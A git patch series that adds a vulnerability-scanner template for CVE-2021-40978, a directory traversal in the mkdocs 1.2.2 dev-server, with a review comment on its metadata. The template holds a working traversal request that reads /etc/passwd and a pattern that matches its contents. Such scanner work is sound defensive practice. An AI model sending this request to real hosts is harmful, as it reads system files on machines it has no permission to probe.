From b22eb1ba01cd9d673fe57cc9a2e8d01bbc291929 Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Thu, 14 Oct 2021 08:37:46 +0700
Subject: [PATCH 1/2] Create CVE-2021-40978.yaml

---
 cves/2021/CVE-2021-40978.yaml | 26 ++++++++++++++++++++++++++
 1 file changed, 26 insertions(+)
 create mode 100644 cves/2021/CVE-2021-40978.yaml

diff --git a/cves/2021/CVE-2021-40978.yaml b/cves/2021/CVE-2021-40978.yaml
new file mode 100644
index 0000000000..0c071a0eb1
--- /dev/null
+++ b/cves/2021/CVE-2021-40978.yaml
@@ -0,0 +1,26 @@
+id: CVE-2021-40978
+
+info:
+ name: mkdocs 1.2.2 built-in dev-server allows directory traversal
+ author: pikpikcu
+ severity: high
+ reference: https://github.com/nisdn/CVE-2021-40978
+ tags: cve,cve2021,mkdocs,lfi
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:[x*]:0:0:"
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200

From 1e4fae76a3790e65c4a42cf49fb34d128d98d565 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Thu, 14 Oct 2021 09:23:48 +0530
Subject: [PATCH 2/2] Update CVE-2021-40978.yaml

---
 cves/2021/CVE-2021-40978.yaml | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)

diff --git a/cves/2021/CVE-2021-40978.yaml b/cves/2021/CVE-2021-40978.yaml
index 0c071a0eb1..47dae4ec2f 100644
--- a/cves/2021/CVE-2021-40978.yaml
+++ b/cves/2021/CVE-2021-40978.yaml
@@ -1,10 +1,12 @@
 id: CVE-2021-40978

 info:
- name: mkdocs 1.2.2 built-in dev-server allows directory traversal
+ name: mkdocs 1.2.2 built-in dev-server allows directory traversal
 author: pikpikcu
 severity: high
- reference: https://github.com/nisdn/CVE-2021-40978
+ reference:
+ - https://github.com/nisdn/CVE-2021-40978
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-40978
 tags: cve,cve2021,mkdocs,lfi

 requests:
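Review bot: The `info` block of the new cves/2021/CVE-2021-40978.yaml (patch 1/2) has no `description`, so a finding reaches the triager with only the one-line name and a link. I would add `description: The mkdocs 1.2.2 built-in dev-server allows directory traversal, so files outside the served docs directory can be read over HTTP.` together with a short remediation sentence telling operators to upgrade mkdocs and keep the dev-server off externally reachable interfaces. The two matchers confirm a passwd-style body and a 200 status but, as far as this hunk shows, nothing that identifies mkdocs itself, so the description should also say that the CVE attribution is inferred from the traversal behaviour and needs confirming on the host. The fixed `/etc/passwd` probe also means a non-Unix host will not match, which is worth stating as a known false-negative case.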
@@ -19,7 +21,6 @@ requests:
 regex:
 - "root:[x*]:0:0:"
 part: body
- condition: and

 - type: status
 status: